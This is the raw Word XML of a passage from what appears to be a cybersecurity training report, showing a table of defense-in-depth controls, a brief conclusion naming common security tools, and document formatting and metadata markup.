        <w:t>To protect against these advanced multi-vector attack paths, modern organizations must deploy a defense-in-depth security model across all architecture layers:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="57619A65" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2932A17B" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Security Architecture Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1669C4A0" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Implemented Control Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="72A8F8E7" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Defensive Remediation Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="1269F433" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CEADFB4" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6994ED88" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11695EE3" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="4048540B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05C9F1D1" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Network Layer Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F4E95A0" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Strict Segmentation &amp; Inline IPS Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74CEE587" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Restricts lateral movement and blocks automated packet manipulation attempts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="71724AF1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31CD0855" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Web Application Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21C572A8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>ModSecurity WAF + OWASP Rule Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2ECC5F57" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Intercepts and blocks application-layer exploits like SQLi and XSS before processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="6AE37963" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48B2048C" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Endpoint Defense &amp; Visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70655895" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Sysmon Logging + EDR Monitoring Arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B043147" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Provides deep process and file integrity logging to detect fileless memory injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="45CB1B4D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33B4A9E6" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Identity Security &amp; Training</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34E6BBCA" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Mandatory Multi-Factor Authentication &amp; Phishing Drills</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12BF090E" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Neutralizes stolen credentials and builds resilience against social engineering vectors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="085EA2D8" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB51549" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE3422D" w14:textId="3199FE14" w:rsidR="00010BDF" w:rsidRPr="00266179" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00266179">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>14.4 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E6CB8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRPr="00266179" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00266179">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This summer training successfully combined advanced offensive security research with modern defensive engineering. By mastering tools like Nmap, Metasploit, Scapy, Caido, and ModSecurity, trainees gained a comprehensive, practical understanding of modern cybersecurity. This technical training establishes a solid foundation for evaluating security risks, engineering proactive network defenses, and helping modern enterprises build resilient infrastructure against emerging threats.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00010BDF" w:rsidRPr="00266179"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777BD" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3205C6AE" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71D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D0529" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="638F01AE" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71D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10C2F" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="2220FA4D" w14:textId="1F209F04" w:rsidR="00266179" w:rsidRDefault="00266179">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1496AD1A" wp14:editId="22793630">
          <wp:extent cx="6047715" cy="1403350"/>
          <wp:effectExtent l="0" t="0" r="0" b="6350"/>
          <wp:docPr id="2250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4589" name="Picture 22504589"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="6066830" cy="140778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076F85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C52A908"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="470" w:hanging="470"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="470" w:hanging="470"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:color w:val="4A777A"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1055621089">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2075930803">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="337121246">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="202210198">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1141264206">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1598101804">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="589386141">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1752695477">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1354725804">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="5159678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BDF"/>
    <w:rsid w:val="000140CD"/>
    <w:rsid w:val="00034616"/>
    <w:rsid w:val="0006063C"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="00266179"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00A470E4"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B71DED"/>
    <w:rsid w:val="00BC03CD"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D556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colormenu v:ext="edit" fillcolor="none [1303]"/>
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="37D3272B"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{A192A454-530F-4681-BF64-8671FC2E6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3885</Words>
  <Characters>22145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Rakesh Singh</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2026-07-03T15:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-03T15:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-03T15:20:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>